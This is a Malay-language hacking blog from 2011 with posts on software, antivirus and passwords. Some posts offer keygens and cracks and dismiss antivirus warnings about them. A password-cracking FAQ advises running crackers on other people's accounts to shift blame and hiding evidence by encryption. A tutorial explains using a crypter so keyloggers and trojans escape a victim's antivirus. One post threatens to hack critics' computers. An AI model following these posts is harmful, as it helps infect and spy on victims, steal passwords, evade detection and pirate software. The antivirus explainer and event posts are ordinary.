31 January 2011

Winamp 5.601 Pro Including Keygen


Salam..
hmm..korang teringin tak memiliki perisian audio player yang paling popular
di seantero dunia ni? siapa yang tak tau Winamp? aku rasa siapa yang tak tau, dia kena amek tau la..
rugi PC power, ram besar, hard disk main saiz 500 gigabyte tapi takde winamp kat dalam..heh~

Winamp ni bagi aku audio player yang paling bagus sekali..selain boleh play audio, ia juga boleh play semua format video yang biasa orang pakai macam flv, avi, mp4, dan 3gp..
selain tu juga, winamp boleh convert apa-apa format audio (Version Pro), kepada fomat mp3, iaitu format yang biasa orang pakai untuk masukkan lagu ke dalam handphone mahupun i-pod..

alaaa..cerita banyak tak guna..apa kata korang pegi aje muat turun dulu perisian ni kat link di bawah:


Winamp 5.601 (Klik di sini)


korang muat turun aje dulu version standard (free version)
kemudian, sila muat turun keygen winamp kat bawah ni:


Keygen Winamp 5.5 (Klik di sini)


Keygen ni gunanya untuk buat winamp free version tu ditukarkan kepada full version a.k.a Pro..sila ambil perhatian bahawa mungkin antivirus akan men-deteksi ia sebagai virus..tapi aku boleh jamin la kat korang yang keygen ni bukan virus ok..
takut? jangan pakai! pakai free version sudah~

apa yang penting ia bukan la virus..biasa la..aku dah buat post hari tu pasal bagaimana perisian antivirus ni berfungsi..apa? belum baca lagi? adoi..korang pegi link kat bawah ni:


Bagaimana Perisian Antivirus Berfungsi (Klik di sini)


ia mengesan keygen tersebut sebagai virus mungkin kerana ada satu skrip kat dalam perisian keygen tu yang menyamai dengan database kamus antivirus tersebut..jadi, tak perlu la bimbang..ok..pada yang suka dengan post aku ni, macam biasa, sila sebar-sebarkan..dan jangan lupa follow yeee...heheheh..:)





Sandboxie 3.52 Crack


Ahaaa..kali ni pula aku nak share dengan korang satu perisian yang terlaris di pasaran dari dulu lagi..
dari zaman aku sekolah lagi..apa perisiannya tu?
ianya adalah SANDBOXIE..
version yang paling terbaru kali ni yang boleh aku bagi kat korang ialah version 3.52..



Apa fungsi Sandboxie kepada PC?

Haaa..kalau nak sebut pasal fungsinya agak banyak la juga..yang paling penting aku nak bagitau korang semua, Sandboxie ni menjalankan program yang korang buka (web browser, video player) dalam satu ruang yang terasing dalam hard disk..lihat gambar di bawah untuk lebih faham..







Tanda panah merah menunjukkan perubahan yang mengalir dari sebuah program yang sedang melalui ke komputer anda. Peti berlabel Hard disk (tanpa sandbox) menunjukkan perubahan oleh program berjalan normal. tempat yang dilabel Hard disk (dengan sandbox) menunjukkan perubahan dengan program yang berjalan di bawah kelolaan Sandboxie. Animasi menggambarkan bahawa Sandboxie mampu menahan perubahan dan mengasingkan mereka dalam sandbox, digambarkan sebagai sebuah kotak segi empat berwarna kuning. Ini juga menggambarkan bahawa dengan mengumpulkan semua perubahan-perubahan sekaligus membuatkan proses untuk memadam kesemuanya sekaligus lebih mudah.



Faedah dari Isolasi Program Oleh Sandboxie

Pelayaran internet yang terlindung: Menjalankan pelayar web anda di bawah perlindungan Sandboxie bererti bahawa semua perisian berbahaya yang telah dimuat turun oleh web browser terperangkap dalam kotak Sanboxie dan boleh dibuang dengan mudah.

Privasi yang lebih: Browsing history, cookies, dan fail-fail sementara cache (temporary file) dikumpulkan semasa melayari internet kekal tinggal di dalam Sanboxie dan tidak bocor ke Windows.

E-mel yang lebih selamat: Virus dan perisian berbahaya yang lain yang mungkin bersembunyi di dalam e-mel anda tidak boleh keluar dari kotak Sandboxie dan tidak dapat menjangkiti sistem anda.

Windows Tetap Lancar: Mencegah kerosakan pada Windows dengan memasang perisian ke dalam sandbox yang terpencil.


Ok semua..korang nak tak download Sandboxie yang latest tu??
orait..aku bagi korang semua link untuk download perisian ni ok..beserta crack sekali..



Klik kat sini ----->>>    Sandboxie 3.52 Including Crack


Cuma fail ni berada dalam enterupload..kalau ada permintaan untuk meminta aku supaya memuat-naiknya ke dalam Mediafire, aku akan berbuat demikian..cumanya, kena ada permintaan dulu la nohhh...
suka post aku kali ni? apa lagi..macam biasa la..barang baik kita kena share..
bagitau kat kawan-kawan la ok..:)








30 January 2011

Bagaimana Perisian Antivirus Berfungsi


Pengenalan

Kerana semakin meningkat ancaman dari virus dan program berbahaya yang lain, hampir setiap komputer hari ini dilengkapi dengan perisian antivirus pra-pasang di dalamnya. Bahkan, antivirus telah menjadi salah satu daripada pakej perisian yang paling penting bagi setiap komputer. Walaupun setiap orang dari kita memiliki software antivirus yang dipasang di komputer kita, hanya sedikit yang benar-benar mahu untuk memahami bagaimana antivirus bekerja! jika korang adalah salah satu di antara orang yang benar-benar akan mahu untuk memahami bagaimana antivirus bekerja, maka artikel ini adalah untuk korang.


Bagaimana Antivirus Melakukan Kerjanya?

Sebuah perisian antivirus biasanya menggunakan pelbagai strategi dalam mengesan dan menghilangkan virus, worm dan program malware yang lain. Berikut ini adalah dua kaedah pengenalan yang paling banyak digunakan:


1. Pengesanan Berasaskan Signature Detection (Pendekatan Kamus)

Ini adalah kaedah yang paling umum digunakan yang melibatkan mencari pola yang dikenali virus dalam fail yang diberikan. Setiap perisian antivirus akan memiliki kamus kod malware sampel disebut tanda tangan (signature database) dalam database itu. Setiap kali sebuah file diperiksa, antivirus merujuk pada kamus kod sampel yang ada di dalam database dan membandingkan dengan fail pada saat itu. Jika potongan kod dalam fail sesuai dengan yang di dalam kamus maka ia ditandai dan tindakan yang tepat diambil untuk menghentikan virus sebelum replikasi lebih jauh. Antivirus boleh memilih untuk memperbaiki fail tersebut, kuarantin atau memadamnya secara kekal berdasarkan potensi risiko virus itu.

Apabila virus baru dan malwares dicipta dan dikeluarkan setiap hari, kaedah pengesanan tidak dapat membela dan melawan malwares baru kecuali sampel mereka dikumpulkan dan tanda tangan yang baru dikeluarkan oleh syarikat perisian antivirus. Beberapa syarikat juga boleh mendorong pengguna untuk meng-upload virus baru atau variasi (variants), sehingga virus dapat dianalisis dan tanda tangan boleh ditambah ke dalam kamus.

Pengesanan berasaskan signature database boleh jadi sangat berkesan, tetapi memerlukan kita untuk sering update dari kamus virus signature database. Oleh kerana itu pengguna harus mengemas kini perisian antivirus mereka secara teratur sehingga dapat bertahan terhadap ancaman baru yang dikeluarkan setiap hari.


2. Pengesanan Berasasan Heuristik (Pendekatan Terhadap Perilaku Mencurigakan)

Pengesanan berasaskan Heuristik melibatkan pengenapastian perilaku yang mencurigakan dari setiap program tertentu yang mungkin menunjukkan risiko berpotensi. Pendekatan ini digunakan oleh beberapa software antivirus canggih seperti ESET NOD32 ANTIVIRUS dan ESET NOD32 SMART SECURITY untuk mengenalpasti malware baru dan variasi malware yang dikenali. Berbeza dengan pendekatan yang berpusat kepada tanda tangan, di sini antivirus tidak mencuba untuk mengenal pasti virus yang dikenali, melainkan memantau perilaku semua program.

Misalnya, perilaku berbahaya seperti sebuah program cuba untuk menulis data ke program eksekusi, ditandakan dan pengguna diperingatkan tentang tindakan ini. Kaedah pengesanan memberikan tambahan tahap keselamatan daripada ancaman yang tidak diketahui.

Fail emulasi: Ini adalah jenis lain dari pendekatan berasaskan heuristik di mana program tertentu dijalankan dalam persekitaran maya dan tindakan yang dilakukan olehnya direkodkan. Berdasarkan tindakan login, perisian antivirus dapat menentukan sama ada program ini berbahaya atau tidak dan melakukan tindakan yang diperlukan dalam rangka untuk membersihkan jangkitan.

Kebanyakan software antivirus komersial menggunakan kombinasi pendekatan keduanya berasaskan signature dan heuristik ntuk memerangi malware.





Isu yang menjadi perhatian




Zero-day threats: Hari Ancaman atau Serangan sifar adalah di mana malware cuba untuk mengeksploitasi kelemahan aplikasi komputer yang belum dikenalpasti oleh syarikat perisian antivirus. Serangan ini digunakan untuk menyebabkan kerosakan pada komputer bahkan sebelum mereka dikenalpasti. Kerana patch belum dikeluarkan untuk ancaman baru, ia dengan mudah dapat mengelakkan perisian antivirus dan melakukan tindakan jahat. Namun sebahagian besar ancaman dikenalpasti selepas satu atau dua hari ia dikeluarkan, tapi kerosakan yang disebabkan oleh ia sebelum pengenalan tanda tangan (signature identification) tidak dapat dielakkan.

Daily Updates: Sejak virus baru dan ancaman dikeluarkan setiap hari, hal ini sangat penting untuk mengemas kini perisian antivirus untuk menjaga definisi virus yang sentiasa dikemaskini. Kebanyakan perisian akan mempunyai ciri-ciri auto-update sehingga definisi virus diupdate setiap kali komputer disambungkan kepada Internet.

Keberkesanan: Walaupun perisian antivirus dapat menangkap hampir setiap malware, hal ini masih belum 100% sangat kebal terhadap segala macam ancaman. Seperti dijelaskan sebelum ini, ancaman zero-day dengan mudah dapat melewati perisai pelindung (protective shield) dari perisian antivirus. Juga penulis virus telah mencuba untuk tetap selangkah di depan dengan menulis kod virus "oligomorphic", "polimorfik" dan "metamorfosa", yang akan meng-enkripsi (melindungi) sebahagian daripada diri mereka sendiri atau mengubah diri mereka sebagai kaedah menyamar, sehingga tidak menyamai tanda tangan virus dalam kamus.

Dengan demikian pendidikan pengguna sama pentingnya dengan perisian antivirus, pengguna harus dilatih untuk amalan kebiasaan surfing aman seperti men-download file hanya dari tapak laman yang dipercayai dan tidak membabi buta melaksanakan program yang tidak diketahui atau diperolehi daripada sumber yang tidak dipercayai. Kami dari pihak My Hackers Are Here berharap artikel ini akan membantu umum untuk memahami cara kerja dari sebuah perisian antivirus.





29 January 2011

C.P.R Untuk Komputer!


Hahaha...korang ingat manusia aje kena C.P.R kalau tengah putus nafas, atau lemas?
ni aku nak tanye sikit..
pernah tak PC korang:

Hilang button FOLDER OPTION?
Task Manager telah hilang atau disable?
Line internet problem, lembab, tersiput-siput?

hahaha..ni tanda-tandanya korang perlukan C.P.R untuk PC korang..
berkemungkinan PC korang tu dah dijangkiti oleh virus-virus lapuk yang tak habis-habis menyusahkan orang dengan men-disable-kan benda-benda penting yang patut ada pada komputer..
aku dah compilekan semua fail-fail untuk buat C.P.R kat PC korang..
jadi tak payah la nak bersusah payah buat yang baru ok?

kat bawah ni aku bagi pautan untuk muat turun..kalau dalam bahasa inggerisnya 'link to download the file' (kot-kot ada yang tak faham dengan istilah PC dalam bahasa melayu la)

C.P.R For PC (Klik di sini)


Antara isi kat dalam rar file tu ialah 2 registration entries (Show Hidden File & Hide File), satu shortcut untuk regedit, dan 4 perisian untuk membetulkan masalah PC seperti line internet (winsockfix), Ultimate Washer (Untuk repair macam-macam masalah PC..kaji sendiri la nohh), Task Manager Fix (untuk membetulkan Task Manager yang telah dijangkiti virus), dan msconfig.

korang suka tak post ni?kalau suka apa lagi..promote benda ni kat kawan-kawan nohhh..



28 January 2011

Password Hacking/Cracking - Soalan-Soalan Lazim


Beberapa Dasar-Dasar Asas Password:

Kebanyakan akaun pada sistem komputer biasanya mempunyai beberapa kaedah untuk menyekat akses ke akaun itu, biasanya dalam bentuk password. Ketika mengakses sistem, pengguna perlu memasukkan ID yang sah untuk menggunakan sistem, diikuti dengan password untuk menggunakan akaun tersebut. Kebanyakan sistem juga tidak memaparkan password sebenar di skrin seperti yang ditaip, atau mereka mencetak tanda bintang di tempat watak nyata.

Dalam kebanyakan sistem, password biasanya dijalankan melalui beberapa jenis algoritma untuk menghasilkan hash. hash ini biasanya lebih dari sekadar versi rawak dari teks asli yang dibuat password, biasanya sebuah hash satu arah. Hash satu arah adalah rentetan aksara yang tidak dapat berbalik menjadi teks asalnya. Kebanyakan sistem tidak "mendekripsi" kata laluan yang disimpan selama pengesahan, mereka menyimpan hash satu arah. Semasa proses login, anda menaip nama akaun dan password. Kata laluan berlari melalui algoritma yang menghasilkan hash satu arah. hash ini dibandingkan dengan hash yang tersimpan dalam sistem. Jika ia adalah sama, diandaikan password yang tepat telah diberikan.

Beberapa algoritma lebih baik daripada yang lain, yang menghasilkan suatu hash satu arah.
Untuk crack password adalah perlu untuk mendapatkan salinan hash satu arah yang disimpan di server, dan kemudian menggunakan algoritma dan menghasilkan hash korang sendiri sehingga dapat satu yang sepadan. Ketika korang dapat 'kata' yang sepadan, apa pun kata yang digunakan untuk menghasilkan hash akan membolehkan korang untuk login ke sistem itu. Kerana ini boleh memakan masa yang lama, automasi biasanya digunakan. Ada password cracker freeware tersedia untuk NT, Netware, dan Unix.


1. Mengapa Perlu Melindungi Hash?

Jika hash satu arah bukan password itu sendiri, melainkan terbitan matematik, mengapa ia harus dilindungi? kerana algoritma tersebut sudah diketahui, password cracker boleh digunakan untuk mendapatkan password yang paling sepadan dan membandingkan hash satu arah sampai dapat kata yang sepadan tersebut. Ada dua jenis pendekatan ke arah ini - melalui 'kamus' (dictionary base attack) dan 'paksaan' (brute force attack).
Biasanya hash disimpan di bahagian dalam sistem yang mengandungi keselamatan tambahan untuk menyekat akses dari cracker yang berpotensi.


2. Apa Yang Dimaksudkan Dengan Dictionary Password Cracker @ Dictionary Base Attack?

Sebuah kamus password cracker hanya mengambil senarai kamus kata, dan satu per satu meng-enkripsi password yang berkemungkinan digunakan dan kemudian membandingkan dengan hash satu arah daripada sistem. Jika hash adalah sama, password tersebut yang dianggap 'cracked', dan 'kata' yang dicuba dari senarai kamus adalah password tersebut.

Beberapa kamus boleh "memanipulasi" setiap kata dalam senarai kata dengan menggunakan penapis. Peraturan-Peraturan / penapis membolehkan pengguna untuk menukar "idiot" menjadi "1d10t" dan variasi lanjutan lain untuk mendapatkan hasil maksimum dari sebuah daftar kata. Yang paling terkenal dari penapis mutasi ini adalah Peraturan-peraturan yang datang dengan Crack (untuk Unix).

Jika kamus cracker tidak memiliki Peraturan manipulasi, korang boleh "pra-mengubati" (pre-treat) wordlist itu. Ada banyak alat untuk memanipulasi senarai perkataan yang memungkinkan segala macam cara untuk menapis, memperluaskan, dan menukar senarai kata. Dengan perancangan yang matang sedikit, korang boleh menukar kumpulan kecil dari senarai perkataan ke dalam senarai yang sangat besar dan menyeluruh untuk kamus kata tanpa manipulasi kata terbina dalam..eh..faham ke ni?? hahaha..kalau bahasa inggerisnya - you can turn a small collection of wordlist into a very large and thorough list for dictionary crackers without those fancy word manipulations built in. (biasa la..aku bercita-cita nak jadikan blog ni 100% berbahasa melayu, sama macam majalah PC..tapi aku risau jugak kalau korang tak faham..)


3. Apa Itu Brute Force Password Cracker @ Brute Force Attack?

Brute Force Cracker hanya akan cuba semua password yang mungkin, sampai ia mendapatkan password yang sebenar. Dari perspektif seorang cracker, ini biasanya sangat memakan masa. Namun, jika diberi waktu yang cukup dan CPU yang berkuasa, password akhirnya akan dapat dipecahkan.

Paling moden brute force cracker membolehkan sejumlah pilihan yang akan ditentukan, seperti panjang password maksimum (maximum password length) atau watak (characters) untuk di-brute force.


4. Kaedah Mana Yang Terbaik Untuk Password Cracking?

Hal ini sangat bergantung pada tujuan, perisian cracking yang dimiliki, dan sistem operasi yang cuba untuk di-crack.
Mari kita lihat beberapa senario.

Jika korang dari jarak jauh memuat fail password melalui beberapa sistem bug, tujuan korang mungkin hanya ingin mendapatkan login ke dalam sistem itu. Dengan fail password, korang sekarang mempunyai akaun pengguna dan hash. Sebuah serangan kamus tampaknya seperti kaedah terpantas, kerana korang mungkin hanya mahu mengakses sesuatu 'tempat' pada PC tersebut.

Jika korang sudah mempunyai akses asas dan menggunakan akses ini untuk mendapatkan fail password, mungkin korang mempunyai akaun tertentu yang ingin korang hack. Sementara beberapa kaedah dengan kamus cracker mungkin boleh membantu, brute force mungkin cara yang terbaik.

Jika perisian password cracker korang mempunyai kedua-dua jenis serangan iaitu dictionary base attack dan brute force attack, dan keduanya cukup lambat, korang mungkin hanya ingin memulakan serangan brute force dan kemudian menjalani hari seperti biasa. Dengan segala cara, aku mengesyorkan dictionary attack dengan senarai kata pra-perlakuan pertama, diikuti dengan brute force hanya dalam akaun yang korang benar-benar inginkan password.

Banyak hacker yang serius mempunyai senarai perkataan yang besar baik dalam bentuk biasa dan pre-treat untuk memudahkan kerja mereka.


5. Apa Itu Salt?

Untuk meningkatkan overhead dalam cracking password, beberapa algoritma menggunakan salt untuk menambah kompleksiti dan kesulitan untuk crack password. Salt ini biasanya 2 hingga 8 byte panjangnya, dan algoritma diperkenalkan untuk lebih mengaburkan hash satu arah. Dari sistem operasi utama dibincangkan di sini, hanya NT tidak menggunakan Salt.

Secara sejarah, cara cracking yang telah dilakukan adalah dengan mengambil password berpotensi, neg-enkripsi dan menghasilkan hash, dan kemudian membandingkan hasilnya untuk setiap akaun dalam fail password. Dengan menambahkan salt, korang memaksa cracker untuk membacanya dan meng-enkripsi password yang berpotensi beserta dengan salt tersebut dalam fail password. Hal ini meningkatkan jumlah masa untuk menyelesaikan semua password, walaupun tentu ada jaminan bahawa password boleh di-crack.


6. Apa Bahaya Dari Password Cracking?

Bahaya cukup simple, dan cukup nyata. Jika korang tertangkap dengan fail password yang korang nyata tidak mempunyai akses yang sah, korang secara teknikal berada dalam 'pemilikan harta yang dicuri' di mata undang-undang. Atas sebab ini, beberapa hacker menjalankan proses hacking dan cracking dalam sistem orang lain, sehingga mengehadkan liabiliti mereka. Aku hanya akan mengesyorkan korang melakukan kaedah ini dalam sistem yang korang mempunyai akaun yang sah atau stabil, tapi mungkin mempunyai cara menjalankan perisian cracking dalam akaun yang bukan milik korang sendiri. Dengan cara ini, jika ditemui cracking (seperti yang sering diketahui - cracking sangat CPU-intensif), ianya akan terlihat sebagai milik orang lain.

Menjalankan perisian cracking dalam privasi di rumah korang sendiri mempunyai kelebihan yang membolehkan korang untuk membuang mana-mana atau semua kuasa pengkomputeran yang korang miliki, tetapi jika tertangkap (katakanlah korang tertangkap akhirnya) maka ada sedikit keraguan bahawa proses cracking sedang berjalan. Namun, ada beberapa perkara yang boleh korang lakukan untuk melindungi diri: meng-enkripsi fail korang. Hanya mendekripsi fail tersebut ketika korang melihatnya, dan memadam @ meng-enkripsi ia kembali selepas korang selesai melihatnya.


7. Apakah Ada Cara Saya Boleh Membuka Dokumen Microsoft Office Yang Dilindungi Kata Laluan?

Tentu saja! Ada banyak program komersial yang akan melakukan hal ini, namun aku berikan props untuk Elcomsoft. versi trial 30-hari boleh didapati di sini.





27 January 2011

Bagaimana Untuk Bypass Antivirus Detection Terhadap Keylogger atau Trojan


Crypter jenis ini ialah UD iaitu undetectable dan bukan FUD (Fully undetectable) kerana ia masih terdeteksi sebagai virus oleh Avira dan Kaspersky. Jadi, kalau mangsa korang pakai antivirus selain dua ni, korang boleh melompat kegirangan la ek..heheheh..

UD Crypter digunakan untuk mengelakkan pengesanan antivirus pada komputer mangsa. Jadi, kita menggunakan software UD Crypter untuk membuat enkripsi kepada keylogger dan trojan. Kerana enkripsi telah dibuat oleh software Crypter, setiap kali mangsa menjalankan keylogger atau trojan yang telah dihantar di komputernya, antivirusnya tidak akan dapat mengesan keylogger sebagai virus dan keylogger dicegah dari dihapuskan pada komputer mangsa.

Perisian ini telah terdeteksi sebagai trojan oleh Antivirus NOD32 Smart Security 4..
namun, jangan bimbang..kalau korang takut berurusan dengan fail-fail vulnerable seperti ini, aku sarankan korang jangan cuba belajar jadi hacker..sebab seorang hacker perlu tahu cara untuk handle fail-fail macam ni..bunyi macam poyo je kan?tapi tu la hakikat..
antara contoh lain, Keygen Winamp 5.5 juga terdeteksi sebagai virus, tapi ia tidak membawa sebarang kod yang boleh mengancam komputer. kalau takut, jangan guna..itu aje..
aku sarankan disable dulu antivirus kalau nak guna perisian ni..bila dah guna, enablekan balik..
nanti pada entry akan datang aku akan ceritakan pulak macam mana Antivirus melakukan kerjanya dan bagaimana deteksi boleh berlaku..ok?



ok..mari kita berbalik kepada tajuk post aku kali ni..



1. Mulakan dengan memuat turun UD Crypter (Klik di sini).

2. Ekstrak file Zip untuk mendapatkan perisian UD Crypter.

3. Jalankan aplikasi Krypter.exe pada sistem komputer korang. Korang akan nampak satu tetingkap (window) seperti di bawah:








4. Sekarang, browse ke file (keylogger atau trojan) yang korang ingin lakukan enkripsi terhadapnya untuk mengelakkan pengesanan antivirus dan tekan pada "Encrypt".

5. Sebuah fail baru akan dibuat dalam direktori yang sama. Sekarang, scan fail ini dengan antivirus dan ia tidak akan mengesan adanya virus code (kecuali Avira dan Kaspersky).

Nota: korang mungkin mendapatkan error tertentu pada komputer seperti ini:









Jika korang menerima mesej ralat ini, install pakej fail Library untuk memperbaiki ralat ini. (Cuba search di google..aku tak sempat la nak cari)

Aku berharap sekarang korang dah boleh menggunakan Crypter UD untuk membuat enkripsi kepada keylogger atau trojan dan bypass pengesanan antivirus terhadapnya..




26 January 2011

Blogwalking Software/Tools Terbaru dari Jiwa Kacau!




Blogwalking Software New Version



Yeah! semalam aku mencuba satu sofware blogwalking yang telah aku muat turun dari tahun lepas (2010)..
hasilnya membawa aku kepada website Jiwa Kacau..
aku ingatkan yang aku muat turun tu dah kira yang paling baru..
rupa-rupanya tidak..
Jiwa Kacau dah update versi terbaru namun perlu diingatkan ianya bukan dari jenis AUTO BLOGWALKING..ianya adalah dari jenis manual, yang mana korang perlu juga melawati blog-blog yang telah dibuka oleh perisian Jiwa Kacau Blogwalking Tools ni, dan kemudian tinggalkan jejak blogwalking macam biasa..tiada istilah 'robot bekerja' untuk korang ok!

Kali ni Jiwa Kacau dah kemaskini perisian tersebut yang hasilnya membawa kepada perisian dari jenis Web-Base..ini kerana katanya beliau tak mahu lagi buat perisian berasaskan installer atas sebab-sebab banyak masalah yang beliau kena kaji tahap dewa ke - 19 (melampau betol review aku ni)

Aku bagi amaran kepada semua BLOGGER-BLOGGER semalaysia..
korang KAJI dulu bagaimana ia berfungsi sebelum buat apa-apa FITNAH atau KUTUKAN terhadap perisian ini mahupun website serta individu pembangunnya (Blur) mahupun tukang review ni! hehehehe..kalau aku dapati mana-mana blog yang kutuk-kutuk belakang, aku tak akan teragak-agak untuk melakukan kerja-kerja cracking terhadap PC, server, dan semua yang berkaitan dengan orang yang mengutuk tersebut pemfailan saman kerana walaupun aku seorang ETHICAL HACKER, aku juga adalah rakyat Malaysia yang mengikut lunas undang-undang..heheh! sebab apa aku warning awal-awal, sebab aku belajar dari pengalaman orang lain!
aku tak mahu jadi mangsa fitnah! muahaha!

Beranikan diri korang mengkaji kalau tak nak dikata BODOH SOMBONG..
ni adalah pandangan dari seorang pembangun perisian,
dan bukan hanya dari seorang blogger..
blogger memandang dari sudut pandangan penulis,tapi berkemungkinan besar blogger tersebut tak faham sepatah haram Computer Programming Language seperti C++, HTML Coding, dan lain-lain..
Oleh itu, BACA LA SAMPAI HABIS OK..


sila baca REVIEW PENUH dari Encik Blur a.k.a JIWA KACAU.COM


Hari ini aku mendapat satu komen yang agak membengangkan kepala otak aku… Komen ini adalah berkaitan Blogwalking Software yang aku sedang develope… Isu ini menjadi hangat kerana semasa aku melancarkan software ini dengan rasminya terdapat juga seorang scripter dari Malaysia yang juga melancarkan scriptnya… Aku malas hendak menceritakan pasal beliau ini… Kami berdua dituduh tanpa usul periksa bahawa kemudahan blogwalking yang kami reka ini memberikan banyak keburukan daripada kebaikan… Contohnya isu traffik satu hala… Untuk pengetahuan blogger diluar sana tidak wujud kisah traffik satu hala dalam dunia moden ini… Aku akan mengulas serba sedikit tentang script yang kami berdua telah cipta ini…

1. Blogwalking Software (Jiwa Kacau)

Software ini adalah hasil kajian aku yang mendalam tentang cara2 yang dapat menjimatkan masa untuk berblogwalking…
Konsep software yang aku reka ini mudah sahaja iaitu blogger yang menggunakan software ini dapat membuka banyak blog dalam satu masa…
Aku telah menetapkan 50 blog yang akan dibuka sekali gus…
Apabila software ini diaktifkan browser korang akan secara automatiknya membuka 50 blog yang telah aku tetapkan dan aku update setiap hari…
Ia sama seperti korang bukak blog Hanis Zalikha, Darkbatman, dan juga Redmummy dengan memasukan URL secara manual pada browser korang… (Tidak mungkin korang akan masuk blog Hanis Zalikha dan Redmummy dari shoutbox)
Ini disebabkan Hanis Zalikha dan Redmummy tidak meniggalkan jejak lagi seprti kita blogger amatur ini…
Korang boleh tengok laporan traffik mereka… (Takkanlah mereka dapat trafik berjuta-juta semua dari Google dan juga blogger yang menglinkan entry mereka di dalam post)
Kalo x caye korang boleh bukak Nuffnang dan kira refferal korang same tidak bilangannya dengan UV korang (Jawapannya 100% tidak)
Ini disebabkan referal ialah penanda dimana reader itu datang ke blog korang cth seperti reader2 korang membaca entry korang apabila mereka search dan entry korang terletak di antara top 10 list di dalam Google…
Kalo korang perhatikan semual refferal adalah URL… Samaada dari Google, Cbox, Shoutmix dan juga blog2 lain yang meletakkan link korang di dalam post mereka…
Jadi tidak timbulah isu traffik satu hala di dalam penggunaan software blogwalking ini…
Pengguna still masih boleh membaca entry terkini, komen dan meningalkan jejak secara manual dengan menggunakan software ini…
Ini kerana software ini adalah MANUAL BLOGWALKING dan buakannya autoblogwalking


2. Auto Shoutmix and Cbox message (ABCDead)

Script ini aku tak tahu macam mana dia cipta…
Mengikut kefahaman konsep yang digunakan ialah setelah script ini aktif dia akan hantar ROBOT untuk crawl page korang dan mencari Shoutmix ataupun Cbox…
Konsep ini sama seperti digunakan oleh Google Inc untuk meletakkan entry blog korang didalam Google Search Engine…
Kelebihan script ini korang melakukan BW secara auto tanpa perlu membuka page tuan empunya blog terdahulu…
Kelemahan script ini pulak korang tidak dapat membaca dan meningalkan komen di blog2 yang korang telah tinggalkan jejak…(Tetapi dengan Blogwalking Software di atas semuanya boleh)
Script ini juga membawa traffik ke blog anda ini disebabkan ROBOT itu merupaka salah satu URL yang terdapat di dalam script tersebut… (Tidak faham??)
Kita ambik contoh URL kepada robot itu ialah… http://domain.com/robot.php
Bila robot ini berjalan2 didalam blog korang dia akan meningkatkan traffik korang secara automatik…
Aku x nak komen panjang pasal script ini…
Semua ini adalah berdasarkan pengalaman aku di dalam bidang IT ini..
Ok korang dah baca sedikit rumusan kepada kedua2 script dan juga software di atas… Sekarang aku nak tegur sedikit si INSAN TAK PUAS HATI berkenaan dakwaan beliau…

Pasal traffik satu hala tu aku dah cerita panjang lebar dekat atas ini…
Pasal klik iklan - Seperti yang korang tahu, Nuffnang telah memberikan amaran keras kepada FRAUD CLICK… Betul juga seperti kata Nuffnang sebab FRAUD CLICK ini menyebabkan rezeki yang diterima oleh para blogger menjadi shubahah… (Kalo x caye boleh search Google ade ustaz yang menerangkan pasal FRAUD CLIKC ini)
Pasal manfaat - Kedua2 belah pihak mendapat manfaat dan kadang2 pihak yang tersenarai didalam BW software ini lebih mendapat manfaat… Amik cotoh anda tersenarai di dalam software ini, tetapi tidak aktif berblogging… Aku pula sering menggunkan software ini dan kadang2 sehingga lebih 5 kali aku guna software ni dalam sehari… Dan ini memberikan blog anda 5UV daripada aku… Dalam masa 10 hari aku telah berikan blog anda 50UV dan anda pula membuka blog dan membalas jejak setiap 5 hari sekali… Peluang untuk anda singgah di blog Jiwa Kacau dan memberikan traffik kepada Jiwa Kacau adalah tipis… Sebab shoutmix hanya simpan message sebanyak 250 sahaja… (konsep aku adalah biar aku bahagi lebih dan satu hari nanti aku akan dapat lebih juga)
Pasal ADIL - Sorry la sebab kebodohan INSAN TAK PUAS HATI untuk tidak membaca E-book yang telah dikeluarkan…
Pasal anda dalam perhatian – Tahu atau tidak setiap kali anda meningalkan komen WordPress akan merekod setiap IP, Email dan juga URL anda… Email dan URL mungkin boleh ditipu tetapi IP tidak boleh ditipu… Bayangkan apa aku boleh lakukan kepada INSAN TAK PUAS HATI jika aku fowardkan IP ini kepada SKMM untuk tidakan… Tetapi aku tidak buat begitu sebab aku paham tidak ramai orang yang celik IT zaman sekarang ini dan juga ada yang hanya tahu MENUDUH TANPA USUL PERIKSA…

Jiwa Kacau




nak pegi ke link perisian web-base blogwalking tersebut? klik kat bawah ni:


Web-Base Jiwa Kacau Blogwalking Software




Haaa...dah selesai baca review beliau?
ni pula tag kawan-kawan aku seperti yang dalam syarat penyertaan Jiwa Kacau..


myHD

Blog Metafizik dan Khazanah Alam

dgodam



(bagi yang tak tersenarai tu aku mintak maaf la eh..aku tak sempat nak tulis banyak-banyak sebab aku kena edit dulu kod supaya bila korang klik, ia akan buka satu lagi tab dari web browser korang menghala ke arah blog/website yang korang klik..so takde la korang terlepas dari blog aku..bleh la korang baca lagi di sini dengan aman..)


Kalau korang nak perisian versi yang boleh dimuat turun pun aku ada..perisian yang sama dibangunkan oleh Jiwa Kacau..kat bawah ni aku sertakan pautan kepada muat turun perisian Jiwa Kacau Blogwalking Software tersebut..cuma versi ni ia akan buka 50 page blog serentak..so..pastikan kelajuan internet korang power!


Jiwa Kacau Blogwalking Software



Kalau korang nak perisian yang dibangunkan oleh Sepaku.net pun aku ada!
korang kaji kedua-dua perisian ni ok..
aku tak sempat nak kaji lagi sebab sibuk dengan kerja-kerja hacking terbaru yang aku baru nak cuba buat..jadi aku serahkan kepada korang untuk menilainya sendiri ok..


Sepaku Blogwalking Version 1.6





25 January 2011

Malaysia IT Fair @ Mid Valley 2011!


Wahhhhh...

adekah korang teringin nak beli external hard disk bersaiz 500GB pada harga RM99???

adekah korang nak wireless keyboard pada harga RM79???

yahhhh...semua ini dan banyak lagi di Malaysia IT Fair @ Mid Valley 2011...

nak tau lebih lanjut??

klik pada pautan yang aku bagi kat bawah ni:


Malaysia IT Fair @ Mid Valley 2011




Advance Archive Password Recovery


Entry kali ni pun aku buat untuk eszol sebab dia request kat aku tadi.. disebabkan aku malas nak tulis, so aku bagi aje la video ni, dengan link untuk korang muat turun perisian tersebut..enjoy! Nota: Bagi sesiapa yang nak request apa-apa sahaja artikel atau perisian, sila berbuat demikian di shoutbox blog ini..terima kasih..




Advance Archive Password Recovery

Crack Password Microsoft Word


Entry kali ni plak aku bagi dekat Eszol a.k.a raar

aku ni dah malas nak tulis hari ni..so...korang tengok aje la video kat bawah ni ok..






Mengembalikan Data/Fail Yang Telah Di Delete


